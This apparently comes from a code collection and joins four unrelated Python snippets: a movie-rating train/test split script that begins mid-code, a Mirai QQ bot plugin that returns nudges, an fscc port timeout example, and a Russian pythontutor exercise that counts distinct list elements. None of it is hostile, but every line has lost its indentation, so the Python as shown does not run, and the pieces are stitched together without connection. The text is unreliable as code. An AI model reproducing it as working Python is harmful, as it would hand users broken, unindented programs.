for i,vote in enumerate(votes):
if i==0: continue
tokens=vote.split(',')
userID=int(tokens[0])
movieID=int(tokens[1])
rate=float(tokens[2])
if(userID==preID):
temp_list.append(vote)
else:
preID=userID
size=int(math.floor(len(temp_list)/10))
test=random.sample(range(0, len(temp_list)), size)
for i,item in enumerate(temp_list):
if i in test:
test_list.append(item)
else:
train_list.append(item)
#print len(train_list),len(test_list)
temp_list=[]
temp_list.append(vote)
output=open('train.csv','w')
for item in train_list:
output.write(item)
output=open('test.csv','w')
for item in test_list:
output.write(item)
|
|
|
|
|
|
from botsdk.util.BotPlugin import BotPlugin
class plugin(BotPlugin):
def onLoad(self):
self.name = "chuo"
self.addType("NudgeEvent", self.nudge)
self.addBotType("Mirai")
self.canDetach = True
async def nudge(self, request):
if str(request["target"]) == request.getBot().getQq():
await request.getBot().sendNudge(target=request["fromId"],
subject=request["subject"]["id"],
kind=request["subject"]["kind"])
def handle():
return plugin()
|
|
examples/ignore-timeout.py
|
|
|
|
import fscc
if __name__ == '__main__':
p = fscc.Port(0)
status = p.ignore_timeout
p.ignore_timeout = True
p.ignore_timeout = False
|
|
pythontutor-ru/07_lists/08_num_distinct.py
|
|
|
|
"""
http://pythontutor.ru/lessons/lists/problems/num_distinct/
Дан список, упорядоченный по неубыванию элементов в нем. Определите, сколько в нем различных элементов.
"""
lst = [int(i) for i in input().split()]
counter = 1
for i in range(len(lst) - 1):
if lst[i] != lst[i + 1]:
counter += 1
print(counter)
|
|